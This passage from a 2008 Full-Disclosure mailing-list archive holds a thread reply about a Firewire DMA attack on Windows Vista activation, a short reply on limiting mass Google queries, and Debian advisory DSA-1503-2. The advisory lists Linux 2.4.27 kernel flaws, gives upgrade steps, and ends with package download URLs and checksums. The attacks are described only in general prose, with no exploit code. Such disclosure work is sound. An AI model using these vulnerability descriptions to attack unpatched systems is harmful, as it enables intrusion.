allow it for the places you expect the device to write to). -- Daniel O'Connor software and network engineer for Genesis Software - http://www.gsoft.com.au "The nice thing about standards is that there are so many of them to choose from." -- Andrew Tanenbaum GPG Fingerprint - 5596 B766 97C0 0E94 4347 295E E593 DC20 7B3F CE8C -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 187 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080306/eb82752c/attachment.bin From tonnerre.lombard at sygroup.ch Thu Mar 6 07:54:37 2008 From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard) Date: Thu, 6 Mar 2008 08:54:37 +0100 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> Message-ID: <20080306085437.3725ad80@wssyg114.sygroup-int.ch> Salut, Roger, On Wed, 5 Mar 2008 16:30:35 -0500, Roger A. Grimes wrote: > As somewhat indicated in the paper itself, these types of physical > DMA attacks are possible against any PC-based OS, not just Windows. > If that's true, why is the paper titled around Windows Vista? That's very easy: because the specific attack was against Windows Vista's activation mechanism. The deficiencies of Firewire with regard to direct memory access have been known for quite a while now. The purpose of the referenced attack was specific to Windows Vista. It is of course also possible though to steal GnuPG keys from the memory of a Solaris machine, of course, that's in the nature of the beast, but this is not relevant to the specific attack mentioned here. May I also add that I am actually aware of patches from vendors which can render this attack ineffective for most other OSes (Solaris, Linux, etc.) - as far as I know, though, there is no such patch for Windows? That might also be a reason why this attack was created and published in the first place - like I said, the attack vector has been known for ages now. > [Disclaimer: I'm a full-time Microsoft employee.] Hi there. ;-) Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33 G?terstrasse 86 Fax:+41 61 383 14 67 4053 Basel Web:www.sygroup.ch tonnerre.lombard at sygroup.ch -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 824 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080306/9123d16f/attachment.bin From v.vitkov at cnsys.bg Thu Mar 6 07:32:23 2008 From: v.vitkov at cnsys.bg (Vladimir Vitkov) Date: Thu, 6 Mar 2008 09:32:23 +0200 Subject: [Full-disclosure] Goolag Perk and Annoyance In-Reply-To: <47CEB241.3020604@krr.org> References: <47CEB241.3020604@krr.org> Message-ID: <200803060932.26842.v.vitkov@cnsys.bg> > Within "most" corporate networks, what effective methods can be used, > from the network's perspective, to block mass Google queries? Probably you are best with some kind of ratelimiting and/or content inspection of http traffic. Probably some payload injection in the flow and blocking the user based on your statisticals ... > > .te > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- BOFH excuse #218: The UPS doesn't have a battery backup. -- Regards Vladimir Vitkov -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080306/04e3196b/attachment.bin From dannf at debian.org Thu Mar 6 07:47:54 2008 From: dannf at debian.org (dann frazier) Date: Thu, 6 Mar 2008 00:47:54 -0700 Subject: [Full-disclosure] [SECURITY] [DSA 1503-2] New Linux kernel 2.4.27 packages fix several issues Message-ID: <20080306074754.GB18766@ldl.fc.hp.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1503-2 security at debian.org http://www.debian.org/security/ dann frazier March 6, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : kernel-source-2.4.27 (2.4.27-10sarge7) Vulnerability : several Problem-Type : local/remote Debian-specific: no CVE ID : CVE-2004-2731 CVE-2006-4814 CVE-2006-5753 CVE-2006-5823 CVE-2006-6053 CVE-2006-6054 CVE-2006-6106 CVE-2007-1353 CVE-2007-1592 CVE-2007-2172 CVE-2007-2525 CVE-2007-3848 CVE-2007-4308 CVE-2007-4311 CVE-2007-5093 CVE-2007-6063 CVE-2007-6151 CVE-2007-6206 CVE-2007-6694 CVE-2008-0007 Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code. The package versions referenced in the initial DSA-1503 advisory introduced a regression that can cause hangs on systems that make use of the ext2 filesystem. The regression has been resolved in the package versions referenced by this updated advisory. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2004-2731 infamous41md reported multiple integer overflows in the Sbus PROM driver that would allow for a DoS (Denial of Service) attack by a local user, and possibly the execution of arbitrary code. CVE-2006-4814 Doug Chapman discovered a potential local DoS (deadlock) in the mincore function caused by improper lock handling. CVE-2006-5753 Eric Sandeen provided a fix for a local memory corruption vulnerability resulting from a misinterpretation of return values when operating on inodes which have been marked bad. CVE-2006-5823 LMH reported a potential local DoS which could be exploited by a malicious user with the privileges to mount and read a corrupted cramfs filesystem. CVE-2006-6053 LMH reported a potential local DoS which could be exploited by a malicious user with the privileges to mount and read a corrupted ext3 filesystem. CVE-2006-6054 LMH reported a potential local DoS which could be exploited by a malicious user with the privileges to mount and read a corrupted ext2 filesystem. CVE-2006-6106 Marcel Holtman discovered multiple buffer overflows in the Bluetooth subsystem which can be used to trigger a remote DoS (crash) and potentially execute arbitray code. CVE-2007-1353 Ilja van Sprundel discovered that kernel memory could be leaked via the Bluetooth setsockopt call due to an uninitialized stack buffer. This could be used by local attackers to read the contents of sensitive kernel memory. CVE-2007-1592 Masayuki Nakagawa discovered that flow labels were inadvertently being shared between listening sockets and child sockets. This defect can be exploited by local users to cause a DoS (Oops). CVE-2007-2172 Thomas Graf reported a typo in the DECnet protocol handler that could be used by a local attacker to overrun an array via crafted packets, potentially resulting in a Denial of Service (system crash). A similar issue exists in the IPV4 protocol handler and will be fixed in a subsequent update. CVE-2007-2525 Florian Zumbiehl discovered a memory leak in the PPPOE subsystem caused by releasing a socket before PPPIOCGCHAN is called upon it. This could be used by a local user to DoS a system by consuming all available memory. CVE-2007-3848 Wojciech Purczynski discovered that pdeath_signal was not being reset properly under certain conditions which may allow local users to gain privileges by sending arbitrary signals to suid binaries. CVE-2007-4308 Alan Cox reported an issue in the aacraid driver that allows unprivileged local users to make ioctl calls which should be restricted to admin privileges. CVE-2007-4311 PaX team discovered an issue in the random driver where a defect in the reseeding code leads to a reduction in entropy. CVE-2007-5093 Alex Smith discovered an issue with the pwc driver for certain webcam devices. If the device is removed while a userspace application has it open, the driver will wait for userspace to close the device, resulting in a blocked USB subsystem. This issue is of low security impact as it requires the attacker to either have physical access to the system or to convince a user with local access to remove the device on their behalf. CVE-2007-6063 Venustech AD-LAB discovered a a buffer overflow in the isdn ioctl handling, exploitable by a local user. CVE-2007-6151 ADLAB discovered a possible memory overrun in the ISDN subsystem that may permit a local user to overwrite kernel memory leading by issuing ioctls with unterminated data. CVE-2007-6206 Blake Frantz discovered that when a core file owned by a non-root user exists, and a root-owned process dumps core over it, the core file retains its original ownership. This could be used by a local user to gain access to sensitive information. CVE-2007-6694 Cyrill Gorcunov reported a NULL pointer dereference in code specific to the CHRP PowerPC platforms. Local users could exploit this issue to achieve a Denial of Service (DoS). CVE-2008-0007 Nick Piggin of SuSE discovered a number of issues in subsystems which register a fault handler for memory mapped areas. This issue can be exploited by local users to achieve a Denial of Service (DoS) and possibly execute arbitrary code. The following matrix lists additional packages that were rebuilt for compatibility with or to take advantage of this update: Debian 3.1 (sarge) alsa-modules-i386 1.0.8+2sarge2 fai-kernels 1.9.1sarge9 kernel-image-2.4.27-arm 2.4.27-2sarge7 kernel-image-2.4.27-m68k 2.4.27-3sarge7 kernel-image-speakup-i386 2.4.27-1.1sarge6 kernel-image-2.4.27-alpha 2.4.27-10sarge7 kernel-image-2.4.27-s390 2.4.27-2sarge7 kernel-image-2.4.27-sparc 2.4.27-9sarge7 kernel-image-2.4.27-i386 2.4.27-10sarge7 kernel-image-2.4.27-ia64 2.4.27-10sarge7 kernel-patch-2.4.27-mips 2.4.27-10.sarge4.040815-4 kernel-patch-powerpc-2.4.27 2.4.27-10sarge7 kernel-latest-2.4-alpha 101sarge3 kernel-latest-2.4-i386 101sarge2 kernel-latest-2.4-s390 2.4.27-1sarge2 kernel-latest-2.4-sparc 42sarge3 i2c 1:2.9.1-1sarge2 lm-sensors 1:2.9.1-1sarge4 mindi-kernel 2.4.27-2sarge6 pcmcia-modules-2.4.27-i386 3.2.5+2sarge2 hostap-modules-i386 1:0.3.7-1sarge3 systemimager 3.2.3-6sarge6 We recommend that you upgrade your kernel package immediately and reboot the machine. If you have built a custom kernel from the kernel source package, you will need to rebuild to take advantage of these fixes. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages Note that this update changes various package names due to ABI changes. You must therefore have the corresponding upgrade-assist metapackage(s) installed for your upgrades to automatically take place. These packages have names with the prefix 'kernel-image-2.4-'. For a full list of the metapackages available for your architecture, run the following command on the target Debian 3.1 system: apt-cache search kernel-image-2.4- Any 3rd party modules that have been built and installed for your system will need to be rebuilt and installed for compatability with the new ABI. Debian 3.1 (oldstable) - ---------------------- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27-10sarge7.dsc Size/MD5 checksum: 900 22df0724bc6eb36386b98719c76aa597 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-sparc_2.4.27-9sarge7.dsc Size/MD5 checksum: 1074 289e404e8f8490a37d50228754d7d206 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-i386_2.4.27-10sarge7.tar.gz Size/MD5 checksum: 101437 c4ec405c3305f12e6292edd842d50403 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-powerpc-2.4.27_2.4.27-10sarge7.tar.gz Size/MD5 checksum: 1466580 cba0ff68b005bc217dd3d968259ced82 http://security.debian.org/pool/updates/main/s/systemimager/systemimager_3.2.3-6sarge6.dsc Size/MD5 checksum: 1027 55ee1489f59168137ab94bbadce013ca http://security.debian.org/pool/updates/main/s/systemimager/systemimager_3.2.3-6sarge6.tar.gz Size/MD5 checksum: 15980963 82f1125ac95154bfbafc191d80d3f5f8 http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27-2sarge6.dsc Size/MD5 checksum: 750 1df9ed6410bf9cdef5060dc44ce035e7 http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27.orig.tar.gz Size/MD5 checksum: 9501 a4ad085824ade5641f1c839d945dd301 http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27-2sarge6.diff.gz Size/MD5 checksum: 6594 6c33b0de262510b4b5bf55de0a9ea3af http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-ia64_2.4.27-10sarge7.dsc Size/MD5 checksum: 1143 584096fb9354fb43d59db0dad3a05c7e http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27-10sarge7.diff.gz Size/MD5 checksum: 785548 c3bf76dd6851bc5b77cbb2a81f9d33ab http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge9.dsc Size/MD5 checksum: 621 340d6e556b3571582bc95d0ab219ff12 http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge9.tar.gz Size/MD5 checksum: 32511 731cd73a9b268291afaedc8386faf528 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-i386_2.4.27-10sarge7.dsc Size/MD5 checksum: 1582 a6a794457f4557f2df67eb2c8191090e http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-image-speakup-i386_2.4.27-1.1sarge6.tar.gz Size/MD5 checksum: 20423 5d60a6d2c2159b887ade18757dc7d426 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-ia64_2.4.27-10sarge7.tar.gz Size/MD5 checksum: 57199 eea61edd2b524231a2a51f820b498eb8 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-alpha_2.4.27-10sarge7.tar.gz Size/MD5 checksum: 33906 d575951af3aaee6ab9a715c02ebfc611 http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-image-speakup-i386_2.4.27-1.1sarge6.dsc Size/MD5 checksum: 732 ee1a35287ea10ea73f84239fc9eefa7d http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27.orig.tar.gz Size/MD5 checksum: 38470181 56df34508cdc47a53d15bc02ffe4f42d http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-sparc_2.4.27-9sarge7.tar.gz Size/MD5 checksum: 26323 207f90189a051f60bc167ad650f4b03e http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-powerpc-2.4.27_2.4.27-10sarge7.dsc Size/MD5 checksum: 1130 05540b391efb661ac080bcd3b76d75d4 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-m68k_2.4.27-3sarge7.dsc Size/MD5 checksum: 876 2147aa6ee213cfeae672e4b8078de79d http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-alpha_2.4.27-10sarge7.dsc Size/MD5 checksum: 831 f99f88476250ba6d8a45e985b76e282c http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-m68k_2.4.27-3sarge7.tar.gz Size/MD5 checksum: 14360 cae077bc611a30d31eca87b11e197743 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-patch-2.4.27-mips_2.4.27-10.sarge4.040815-4.dsc Size/MD5 checksum: 1050 42da2129d3c3e7272c35b2cd38fb6df1 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-s390_2.4.27-2sarge7.dsc Size/MD5 checksum: 832 18e08f7d72b58025bc87feeb2eb1b772 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-arm_2.4.27-2sarge7.dsc Size/MD5 checksum: 839 112e605d8e6feacbb79acbe2bee8a82b http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-s390_2.4.27-2sarge7.tar.gz Size/MD5 checksum: 12084 bda7fe345a19ff29c971bae517477785 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-arm_2.4.27-2sarge7.tar.gz Size/MD5 checksum: 37388 492895463965930fe7276a465bb4bf7f http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-patch-2.4.27-mips_2.4.27-10.sarge4.040815-4.tar.gz Size/MD5 checksum: 310574 d558a24549b13a9e86bdc2c50502aced http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-i386_1.0.8+2sarge2.dsc Size/MD5 checksum: 1121 2e094a561912a0acf6cc5edf3f122ca8 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-i386_1.0.8+2sarge2.tar.gz Size/MD5 checksum: 5249 1604fe719636c98547f287653a7cf0a8 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-latest-2.4-alpha_101sarge3.dsc Size/MD5 checksum: 685 3684714d888d9897193781152b1bb2fa http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-latest-2.4-alpha_101sarge3.tar.gz Size/MD5 checksum: 1987 e4c3061eb307723a40cd3bbc0e28fcc4 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-latest-2.4-i386_101sarge2.dsc Size/MD5 checksum: 1345 4686200ea3a9e29560dffde21e35d247 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-latest-2.4-i386_101sarge2.tar.gz Size/MD5 checksum: 2651 6aff151a16ad2211e6f118efdd2fca6d http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-latest-2.4-s390_2.4.27-1sarge2.dsc Size/MD5 checksum: 663 afa6f7006f0e5f28f08f81ab0c0cba7b http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-latest-2.4-s390_2.4.27-1sarge2.tar.gz Size/MD5 checksum: 1629 631165e8731c66fc60e875371c649a03 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-latest-2.4-sparc_42sarge3.dsc Size/MD5 checksum: 846 e49c48cbef5fce4aac4ca3bfd9b97518 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-latest-2.4-sparc_42sarge3.tar.gz Size/MD5 checksum: 2281 d72e0b2a828d4db9076142f8092a83b0 http://security.debian.org/pool/updates/main/i/i2c/i2c_2.9.1-1sarge2.dsc Size/MD5 checksum: 857 2f49354f5660d561153dcdb283a04c60 http://security.debian.org/pool/updates/main/i/i2c/i2c_2.9.1-1sarge2.diff.gz Size/MD5 checksum: 9671 afae6ba433c81376fc42fb5de1750169 http://security.debian.org/pool/updates/main/i/i2c/i2c_2.9.1.orig.tar.gz Size/MD5 checksum: 142961 eb3d1df2d3b46f199af2485db612c76d http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4.dsc Size/MD5 checksum: 1089 5f669ca85a85782c1040d45c351d965e http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4.diff.gz Size/MD5 checksum: 33474 f96bd95e933f2ad4184a64141a11a375 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1.orig.tar.gz Size/MD5 checksum: 870765 f5af615e39441d95471bdb72a3f01709 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-i386_3.2.5+2sarge2.dsc Size/MD5 checksum: 825 1b3ccb11081c743293e515f0864f76f7 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-i386_3.2.5+2sarge2.tar.gz Size/MD5 checksum: 105479 c2b1bb5c024aec2c4938866fda42a536 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-i386_0.3.7-1sarge3.dsc Size/MD5 checksum: 1092 1682bf8794992d2bd327227cbe21fb77 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-i386_0.3.7-1sarge3.tar.gz Size/MD5 checksum: 2328 c3f3f0a00cd017334a3d045142f11b6f Architecture independent packages: http://security.debian.org/pool/updates/main/s/systemimager/systemimager-server-flamethrowerd_3.2.3-6sarge6_all.deb Size/MD5 checksum: 18604 2f19a5a567fbabbb7c85c2b6a8c09715 http://security.debian.org/pool/updates/main/s/systemimager/systemimager-boot-i386-standard_3.2.3-6sarge6_all.deb Size/MD5 checksum: 4762170 b1fe544ae766e72cee10767ca4c220e6 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27-10sarge7_all.deb Size/MD5 checksum: 31044984 7d0808008f6970beab99f97ca2b298be http://security.debian.org/pool/updates/main/s/systemimager/systemimager-server_3.2.3-6sarge6_all.deb Size/MD5 checksum: 119958 382abca5012ab6d2b356ad8e59695e74 http://security.debian.org/pool/updates/main/s/systemimager/systemimager-boot-ia64-standard_3.2.3-6sarge6_all.deb Size/MD5 checksum: 9548928 9fad5a3acdaf046eb9fc4f88df059d9d http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-patch-debian-2.4.27_2.4.27-10sarge7_all.deb Size/MD5 checksum: 750682 08e90159e79f3dcaff09d2fe2ed87a70 http://security.debian.org/pool/updates/main/s/systemimager/systemimager-doc_3.2.3-6sarge6_all.deb Size/MD5 checksum: 633934 411cb1f4623b44d7abf520ace4080fab http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-tree-2.4.27_2.4.27-10sarge7_all.deb Size/MD5 checksum: 29022 8dfa828bb9121672e42211217f398437 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-doc-2.4.27_2.4.27-10sarge7_all.deb Size/MD5 checksum: 3582288 43a6f2a4a53cb8a64de8282a9aa1aac3 http://security.debian.org/pool/updates/main/s/systemimager/systemimager-client_3.2.3-6sarge6_all.deb Size/MD5 checksum: 32832 177d55441631c5c922e6ce28b61e6b82 http://security.debian.org/pool/updates/main/s/systemimager/systemimager-common_3.2.3-6sarge6_all.deb Size/MD5 checksum: 32964 5027eb39810134cff2c20eb3af6894b2 http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-doc-2.4.27-speakup_2.4.27-1.1sarge6_all.deb Size/MD5 checksum: 2422274 0872bf637bd0f2aa3743bcc07badf943 http://security.debian.org/pool/updates/main/i/i2c/i2c-source_2.9.1-1sarge2_all.deb Size/MD5 checksum: 159972 52f3d8c35dc66b3806fdcbd5911172ef http://security.debian.org/pool/updates/main/i/i2c/kernel-patch-2.4-i2c_2.9.1-1sarge2_all.deb Size/MD5 checksum: 106162 c020f32c2b9c0bb3f60a8d7aa536202b http://security.debian.org/pool/updates/main/l/lm-sensors/kernel-patch-2.4-lm-sensors_2.9.1-1sarge4_all.deb Size/MD5 checksum: 304594 17171ede79299ea662c0eb92c09d7b89 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-source_2.9.1-1sarge4_all.deb Size/MD5 checksum: 945778 b5cd269a473566b2eab20477bb5ccc75 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-4-generic_2.4.27-10sarge7_alpha.deb Size/MD5 checksum: 274656 a6df8d76730f2c04e8ba46c82eaa5fc6 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-4-smp_2.4.27-10sarge7_alpha.deb Size/MD5 checksum: 16992022 e5b6094a6f61b599dfc7d2898988d8c9 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-build-2.4.27-4_2.4.27-10sarge7_alpha.deb Size/MD5 checksum: 9610 c5a4813b3f702377190850f70452be03 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-4-generic_2.4.27-10sarge7_alpha.deb Size/MD5 checksum: 16537552 cf594a1ceb7d46217bb3cfda97b1a167 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-4_2.4.27-10sarge7_alpha.deb Size/MD5 checksum: 4576374 c8032d43cdf035fbf98b46a35ada9a58 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-4-smp_2.4.27-10sarge7_alpha.deb Size/MD5 checksum: 276726 81c66d5d53c9f2aeed32082ccf6102ff http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_alpha.deb Size/MD5 checksum: 21916 2a099f54c14bce29e42ff99d37160b23 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-headers-2.4-generic_101sarge3_alpha.deb Size/MD5 checksum: 2004 b85b43e7e593767ac3c2e9759800441c http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-headers-2.4-smp_101sarge3_alpha.deb Size/MD5 checksum: 2010 5095855832ed1006e4d11c2d9e0325b7 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-image-2.4-generic_101sarge3_alpha.deb Size/MD5 checksum: 2008 44d187a24b738878ec0624a096fdb5f4 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-image-2.4-smp_101sarge3_alpha.deb Size/MD5 checksum: 2016 55ea69109097ddcc254609df82c98e91 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_alpha.deb Size/MD5 checksum: 107844 1df7a5f675e7d69c495d193cdabe589b http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_alpha.deb Size/MD5 checksum: 88110 fe1af960b05f134ffe51eb747c3d885b http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_alpha.deb Size/MD5 checksum: 469728 67bc75eea11a4793b7c3c4192967a63e http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_alpha.deb Size/MD5 checksum: 60276 09c63592a3b029bc07267f0d448f4353 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_amd64.deb Size/MD5 checksum: 18684 757148cf3a63e229b89544783dc05966 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_amd64.deb Size/MD5 checksum: 99830 92baa443758b2b7c382c63bd43a4c307 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_amd64.deb Size/MD5 checksum: 86298 22243ba8ddd9758abd0e903efd56348c http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_amd64.deb Size/MD5 checksum: 474426 6309d8298cb861c43522f62f8e056618 http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_amd64.deb Size/MD5 checksum: 58162 b392fad5c96cae76cd7cf63441da23b5 arm architecture (ARM) http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-headers-2.4.27_2.4.27-2sarge7_arm.deb Size/MD5 checksum: 4728218 76872bab628efe1f106714bea7e76ddf http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-build-2.4.27_2.4.27-2sarge7_arm.deb Size/MD5 checksum: 484954 a86240d80ceb1f5e460480911978df1a http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-bast_2.4.27-2sarge7_arm.deb Size/MD5 checksum: 1698810 e162255451f3d58f6ec1e07755d7e5c3 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-riscstation_2.4.27-2sarge7_arm.deb Size/MD5 checksum: 3693254 8062de0bc5d461a7b0de03645ca806d0 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_arm.deb Size/MD5 checksum: 20410 ae67f0082728dfad5e587df6b08b729b http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-lart_2.4.27-2sarge7_arm.deb Size/MD5 checksum: 1062654 3e8fa5d77babde87f4ad27ad2b80d81f http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-riscpc_2.4.27-2sarge7_arm.deb Size/MD5 checksum: 3169126 800ee46456c835fa227497d2dab1e2f7 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-netwinder_2.4.27-2sarge7_arm.deb Size/MD5 checksum: 7379382 65252aa02259f9bf57d3847ae72d874f http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_arm.deb Size/MD5 checksum: 95846 4acbe7e69f8aa23f093f159664730999 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_arm.deb Size/MD5 checksum: 77674 07d25a97e860701737aa3216ac05d234 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_arm.deb Size/MD5 checksum: 466626 b763f7bd0908a8832a8bb216e6f64b92 http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_arm.deb Size/MD5 checksum: 56632 9f90bcb915e0e601ee8e78b666b53c40 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_hppa.deb Size/MD5 checksum: 20780 35b46e85bfb60401e4c97bc3737f164a http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_hppa.deb Size/MD5 checksum: 103546 c7567ff1155e94df83a6bbcd9de015c6 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_hppa.deb Size/MD5 checksum: 88188 bf39feccae69a7235cb1ba71d1491f22 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_hppa.deb Size/MD5 checksum: 470564 314e97748eeef8b0cab4891ddb69b7d4 http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_hppa.deb Size/MD5 checksum: 59532 85137aedcac347b66103668efc3b68fc i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-4-586tsc_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 12040638 8eec475d9babaeb5d25b7b865f026cb4 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-4-386_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 11053046 8929fb193f16f2b31b4b7809aaea53be http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-4-686_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 302228 eeb50dc4e7bc6e46270b1ffc6a7c022a 